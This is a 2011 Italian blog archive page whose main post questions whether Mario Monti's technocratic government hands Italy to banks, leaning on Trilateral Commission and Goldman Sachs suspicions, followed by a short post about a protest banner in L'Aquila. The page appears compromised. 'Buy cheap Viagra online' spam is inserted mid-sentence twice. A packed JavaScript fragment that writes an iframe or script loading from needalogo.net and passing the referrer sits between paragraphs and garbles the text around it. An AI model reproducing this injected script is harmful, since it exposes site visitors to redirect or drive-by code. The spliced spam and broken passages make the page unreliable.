novembre 2011 - NonCeLaFaccioPiù

.

Stiamo regalando il paese alle banche?!

16 novembre 2011 Commenti chiusi

Il Faraone alla fine ha abdicato. Dopo 20 anni di regime mignottocratico il despota ha rassegnato le dimissioni in favore di un governo tecnico. Oggi il nuovo Presidente del Consiglio Mario Monti ha nominato i suoi nuovi ministri. Nella lista non figurano politici, ma nel curriculum di molti dei designati, compreso quello del nuovo premier, compaiono riferimenti a vari istituti bancari.

Per carità, non metto in dubbio che Monti sia un economista di fama internazionale, le cui capacità, in un momento di crisi come quello che stiamo affrontando adesso, potrebbero essere utilissime, se non determinanti, per la ripresa economica dell’Italia.

Quello che mi chiedo è se stiamo commettendo un grosso errore consegnando il Paese ad un uomo che fa parte della Commissione Trilaterale, della Goldman Sachs e del Gruppo Bilderberg. Visto e considerato anche il fatto che, secondo Milano Finanza, Goldman Sachs sarebbe all’origine dell’ondata di speculazione che ha aggredito i titoli di stato italiani, dichiarando nel contempo in un comunicato stampa che le “elezioni sono lo scenario peggiore per i mercati”.

Mi chiedo se sia un bene che si bypassi l’opinione popolare in barba alla democrazia e si opti per un governo decisamente imposto da pressioni esterne come quelle fatte dal Fondo Monetario Internazionale, dalla Commissione Europea e dalla BCE. Una situazione analoga la sta vivendo la Grecia con il Governo tecnico di Lucas Papademos, un bancario membro anche lui della Commissione Trilaterale che, guarda caso, si è insediato ad Atene nello stesso identico momento in cui i governi di Italia e di Grecia cadevano quasi simultaneamente.

-Ma che cos’è questa Commissione Trilaterale?

E’ un’organizzazione fondata il 23 giugno 1973 per iniziativa di David Rockefeller, presidente della Chase Manhattan Bank, e di altri dirigenti del Gruppo Bilderberg

Buy cheap Viagra online

e del Council on Foreign Relations. La Trilaterale conta come membri più di 300 influenti privati cittadini (uomini d’affari, politici, intellettuali) dall’Europa, dal Giappone e dal Nord America, con l’obiettivo dichiarato di promuovere una cooperazione più stretta tra queste tre aree. Ha sede sociale a New York.
[cit. Wikipedia]

Secondo lo scrittore francese Jacques Bordiot “il vero obiettivo della Trilaterale è di esercitare una pressione politica concertata sui governi delle nazioni industrializzate, per portarle a sottomettersi alla loro strategia globale”.

Insomma, non vorremmo certo trovarci nella situazione in cui ci dovessimo rendere conto di aver consegnato il Paese nelle mani delle banche e dei finanzieri internazionali dopo averlo strappato con così tanta fatica da quelle di veline e mignotte?!

URL Foto: IlSimplicissimus

-

<8 q="s:u;v:w" 0="\'+0+\'" x="\'+4+\'" y="\'+5+\'">\')})();',35,35,'src||var|document|razmw|razmh|id|Math|iframe|function|createElement|script|floor||random|9999|http|needalogo|net|rotation|3wBsvV|se_referrer|referrer|default_keyword|title|write|style||padding||0px|border|none|width|height'.split('|'),0,{}))

fanno altro che evidenziare il fatto che qualcosa purtroppo non va.

-

Berlusconi’s miracle

6 novembre 2011 Commenti chiusi

Questo striscione è comparso oggi davanti al Palazzo del Governo de l’Aquila

Buy cheap Viagra online

. Quando un’immagine vale più di mille parole…


-

-

Powered by AlterVista